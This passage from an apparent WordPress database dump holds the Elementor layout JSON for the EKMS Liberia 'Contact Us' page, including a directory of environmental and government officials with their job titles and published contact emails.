Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23150,3349,'_elementor_edit_mode','builder'),(23151,3349,'_elementor_template_type','wp-page'),(23152,3349,'_elementor_version','3.0.16'),(23153,3349,'_wp_page_template','default'),(23154,3349,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental 